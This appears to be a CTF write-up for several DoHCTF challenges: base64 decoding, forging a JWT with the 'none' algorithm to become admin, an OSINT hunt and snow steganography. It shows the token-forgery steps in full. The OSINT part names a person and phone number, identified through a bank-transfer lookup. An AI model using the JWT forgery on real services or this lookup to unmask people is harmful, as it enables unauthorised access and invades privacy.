So, for this part I just followed the link the Discord cahnnel and i got this base64 string RG9IQ1RGe3RyeV90b19iZV9oYWNrdGl2ZV9vbl9kaXNjb3JkX2hlaGVoZWhlaGVoZX0K
So running this command echo 'RG9IQ1RGe3RyeV90b19iZV9oYWNrdGl2ZV9vbl9kaXNjb3JkX2hlaGVoZWhlaGVoZX0K' | base64 -d. I was able to get the flag "DoHCTF{try_to_be_hacktive_on_discord_hehehehehehe}"
This is really easy and quick, the flag has already been given, which is the name of the challenge, so the flag is "DoHCTF{_colwSPs:(}"
The flag for this is just Simply "Yes"
Following the link https://diaryofhackers-jwtvuln.chals.io/ink We got to the website
I got this jwt Token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.iJ9U4tIUxxLbbOb_YXVkpvkBqtPsFtAxWIvmcakDfL0
The token has three part(taking note of the dots) and they are all in Base64, but we are concerned with the first two which are:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 {"alg":"HS256","typ":"JWT"} eyJ1c2VybmFtZSI6Imd1ZXN0In0 {"username":"guest"}
So what we are going to do now is that we are going to do some changes which will look like this:
{"alg":"none","typ":"JWT"} {"username":"admin"}
Now we base64 encode them back: "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=" "eyJ1c2VybmFtZSI6ImFkbWluIn0="
Now that we have new enocded strings we join them together with dots, and we also remember the third part of the original token. So the new token will looklike this:
"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VybmFtZSI6ImFkbWluIn0=.iJ9U4tIUxxLbbOb_YXVkpvkBqtPsFtAxWIvmcakDfL0"
Replace it with the original token in the using the devtools. Then you get your flag "DoHCTF{jwt_has_a_none_algo_loll}"
For this challenge we were provided with a phone number "+2348109439442". We are asked to find someone on LinkedIn whose third name is "Mustapha". After trying several Osint tools on the phone(i even tried using True caller) it did not yield anything. So i open my bank app and did as if i wanted to transfer some money to the phone number(Bank to PalmPay). Then i go the person's Which is "Adebayo Ekeh Mustapha". Then i went to LinkedIn to search for the name
I got this Base64 from the profile "RG9IQ1RGe3RoYXRfd2FzX2Vhc3lfcmlnaHQ/X3JpZ2h0P30K" decoding it we got the flag "DoHCTF{that_was_easy_right?_right?}"
After downloading the file,i open it and notice it had some extra space in it. Search for what type of steg file it so i found out it is a snow steganography so i used this command to solve it "stegsnow -C 0cold_flag.txt" and i got the flag "DoHCTF{another_quite_simple_one}"